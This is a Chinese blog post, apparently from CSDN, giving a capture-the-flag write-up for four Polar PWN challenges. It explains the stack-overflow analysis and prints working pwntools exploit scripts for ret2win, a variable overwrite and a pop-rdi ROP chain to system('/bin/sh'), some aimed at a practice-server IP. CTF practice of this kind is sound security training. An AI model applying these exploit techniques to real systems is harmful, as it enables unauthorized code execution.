Polar PWN内容WP 二

最新推荐文章于 2024-07-17 15:00:16 发布
最新推荐文章于 2024-07-17 15:00:16 发布
阅读量1.7k 收藏 56
点赞数 26
分类专栏: PWN靶场 文章标签: 网络 linux 安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pythonZLX/article/details/136808113
版权

五、emm

下载文件放入虚拟机中查看一下

32位ELF文件,开启栈不可执行保护(NX)

放入IDA中看一下

映入眼帘的就是一个flag函数,直接看一下flag函数中的内容

好嘛!cat flag 思路明确了

接着我们进入main函数中出现的yes函数,查看一下yes函数中的内容

一个栈溢出,read写入的是100个字节,远远超出定义的58字节

利用溢出,返回cat flag

思路有了

计算偏移地址

偏移地址:0x58+4

找出flag函数地址

flag_addr=0x80484CB

差不多了,开搞!

from pwn import *
r =remote("ip", port)
​
flag_addr=0x80484CB
padding=0x58+4
payload=b'a' * padding + p32(flag_addr)
r.sendline(payload)
r.interactive()

运行脚本后得到flag

六、Choice

下载 虚拟机 查看

64位ELF文件,开启NX保护

进入IDA查看

发现有3个函数,Data1-3

进入Data1查看

有溢出,但不多 达不到攻击条件

进入Data2查看

同Data1 一样 溢出但不多

进入Data3查看

这才对嘛,有溢出,也够用!

找到了溢出点再找找有没有后门函数 shift+F12查找字符串

跟踪进入看一下,这是哪个函数里的

标准,太标准了 标准且典型的后门函数

思路有了:利用Data3函数中的溢出,返回到这个后门函数

现在是找出地址

先找到后门函数地址:0x4007BD

然后找出偏移地址:0x30+8

编写脚本开干

from pwn import *
r =remote("120.46.59.242", 2112)
​
flag_addr=0x4007BD
padding=0x30+8
payload=b'a' * padding + p64(flag_addr)
r.sendlineafter(b'Menu:\n',b'3') //注意,进入Data3函数之前是要输入数值的 这里发送个3 使其进入Data3函数
r.sendline(payload)
r.interactive()

运行脚本后cat flag即可

七、overload1

这题我也没理清思路,所以就直接按照WP写了,有懂的可以评论一下 让我开开眼

下、放、查

ELF 64 NX开

IDA 看

使用了gets函数,是个溢出

if语句中v5[1]97进行了比较,当v5[1]等于97,可以执行system()函数。

所以就是利用溢出,将v5[1]的值覆盖成97 也就是ascii码中的‘a’

进入main函数的第一个if循环,输入一个y。

通过构造攻击链让程序返回v5[1]等于字符a

已知溢出变量和所要覆盖变量的距离即可算出距离,构造出Payload。

payload =  0x110 * 'a'

脚本如下

from pwn import *
r =remote("IP",port)
#r = process("./overload1")
elf = ELF("./overload1")
r.recvline()
r.recvline()
payload = 'y'
r.sendline(payload)
#payload1 = 0x120 * 'a'
payload1 = 0x110 * 'a'
r.recvline()
r.sendline(payload1)
r.interactive()                          

八、X64

查看一下文件

64位ELF文件,什么都没开???!!认真的么铁子

进入主函数发现有一个function函数,进入function函数查看

一个溢出点

shift+F12查看字符串

有bin/sh字符串

但是bin/sh字符串并没有和system组合在一起,因此我们需要通过传参将bin/sh传入到system中

64位传参:参数从左到右放入寄存器:RDI, RSI, RDX, ECX, R8, R9,之后跟32位一样

大体思路如下:

找出溢出偏移量、进入function函数中、覆盖返回地址为shell 将/bin/sh作为参数传入

开始找值:

偏移量:0x80+8

bin字符串地址:0x601060

system地址:0x4006B6

还差一个rdi地址

使用命令:

 ROPgadget --binary x64 --only "pop|ret"

找到RDI地址

RDI_addr=0x4007e3

编程搞事

from pwn import *
r =remote("120.46.59.242", 2130)
​
bin_addr=0x601060
padding=0x80+8
sys_addr=0x4006B6
rdi_addr=0x4007e3
payload=b'a' * padding + p64(rdi_addr)+p64(bin_addr)+p64(sys_addr)
r.sendline(payload)
r.interactive()

运行,然后cat flag即可

阿斯顿法国红酒快
关注
  • 26
    点赞
  • 56
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
polarDB for Pgsql
08-26
阿里云的rpm安装包
polardb-jdbc18.zip
10-20
PolarDB-JDBC18特性 2.1 高性能 PolarDB-JDBC18优化了网络通信协议,减少了网络延迟,提升了数据读写性能。同时,它支持PolarDB的分布式事务处理,保证了业务的强一致性。 2.2 兼容性 该驱动兼容JDBC 4.2及...
Polar PWN内容WP
pythonZLX的博客
03-19 1444
老规矩查看一下文件64位开启nx保护进入ida查看一下有两个函数,一个叫dalao,一个叫caiji输入1进入大佬函数,输入2进入菜鸡函数,先进去大佬函数看一下淦,被骂了;进入菜鸡函数看一下一个溢出漏洞,shift+F12查找字符串有bin/sh跟踪一下发现一个标准的后门函数思路:输入2进入菜鸡函数,然后利用溢出跳到后门函数位置编写然后cat flag即可。
Polar PWN内容WP
pythonZLX的博客
03-17 1303
NX保护机制:将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。Stack保护机制:在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致。我们继续,将程序丢入IDA64中查看一下main函数发现一个叫box的函数,进去看一看。
Polar PWN内容WP
pythonZLX的博客
06-17 350
先去下载文件,然后导入到虚拟机中file和checksec一下可以看到是64位程序,并且同时开启了金丝雀和NX保护我们将程序放进IDA中查看一下源码有一个很明显的后门函数,但是需要一些条件在我们运行程序的时候会问我们是不是喜欢小猫,此时有两个选项其实不管输入哪个都无法触发后门函数,因为输入的内容是在buf变量中,而参与判断的是s2变量。我们发现buf变量定义是32个而read可输入的是40个,所以这里有溢出点buf到s2的距离是0x50-0x30。
PolarCTF 2024夏季个人挑战赛 个人WP
Jay17的博客
06-02 1049
PolarCTF 2024夏季个人挑战赛 个人WP
Polar靶场做题 —— test_format
2301_76262491的博客
10-12 218
PolarD&N_pwn_test_format
PolarCTF2023冬季个人挑战赛wp含web、misc、crypto_polar冬季赛(1)
m0_60635637的博客
04-08 734
链子`User::__wakeup()->User::printName()->Surrender::__toString()->FileRobot::__get()->FileRobot::__invoke()->FileRobot::Get_file()`**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,蚁剑,不过我连接的时候,警告返回数据为空?
2023Polar CTF冬季个人挑战赛部分wp
ZJPC007的博客
12-10 389
第一次参加polarctf的比赛,做的不好,把做出来的题目wp传上来和大家分享做题方法,哪里有错还请大佬指教。题目还能复现的,在平台上就能做。
PyBioMed:一个用于化学物质、蛋白质和DNA及其相互作用的各种分子表示的Python文库
热门推荐
weixin_46266120的博客
04-25 12万+
计算蛋白质描述符——PyProtein PyProtein是用于蛋白质特征计算的工具。PyProtein从氨基酸序列中计算蛋白质和肽的结构和物理化学特征。这些序列衍生的结构和理化特征已被广泛用于开发机器学习模型,用于预测蛋白质结构和功能类别,翻译后修饰,亚细胞位置和特定性质的肽。在 PyProtein 模块中,有两种方法可以计算蛋白质描述符。一种是直接使用相应的方法,另一种是首先构建一个PyProtein类,然后运行他们的方法来获得蛋白质描述符。应该注意的是,输出是字典形式,其键和值分别表示描述符名称和
rect2polar.zip_cordic_rect2polar
07-14
标题中的"rect2polar.zip_cordic_rect2polar"揭示了这个压缩包内容主要涉及将直角坐标(rectangular)转换为极坐标(polar)的算法,且使用了CORDIC(协调数字控制器,Coordinate Rotation Digital Computer)算法。...
Polar编码matlab程序
03-26
1. 极化过程:Polar码的核心思想是通过串并转换和进制输入的合成信道(BEC)的迭代应用,将原始信道分成多个子信道,其中一部分子信道的误码率接近于0(称为“冻结”子信道),另一部分则接近于1(非冻结子信道)...
CODE_matlab_polarcode_code_polar_
10-04
标题中的"CODE_matlab_polarcode_code_polar_"暗示了这是一个关于使用MATLAB实现极化码(Polar Code)的项目。极化码是一种新兴的纠错编码技术,由Erdal Arıkan在2009年提出,主要用于提高信道传输的可靠性。这种...
SpringBoot整合SSE,实现后端主动推送DEMO
zjy660358的专栏
07-17 171
说起服务端主动推送,大家第一个想到的一定是WEBSOCKET。作为软件工程师,不能无脑使用一种技术,要结合实际情况,择优选取。SSE(Server-Sent Events)相比于WEBSOCKET1、轻量化、兼容性 基于传统的HTTP协议,所以浏览器兼容性比较好2、 只支持单向通讯。(服务器->客户端)
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 395
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 668
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 738
计算机网络技术期末复习
最新发布
CWPIN21的博客
07-17 652
本文深入探讨了计算机网络的核心概念与关键技术。涵盖了网络拓扑结构,如星型、总线型和环形等,分析了它们的特点与适用场景。详细阐述了 TCP/IP 协议栈的工作原理,包括 IP 地址分配、子网掩码的作用以及路由选择算法。还探讨了网络安全方面的常见威胁,如病毒、黑客攻击等,并介绍了相应的防护措施。通过实例,让读者对计算机网络有更全面、深入的理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值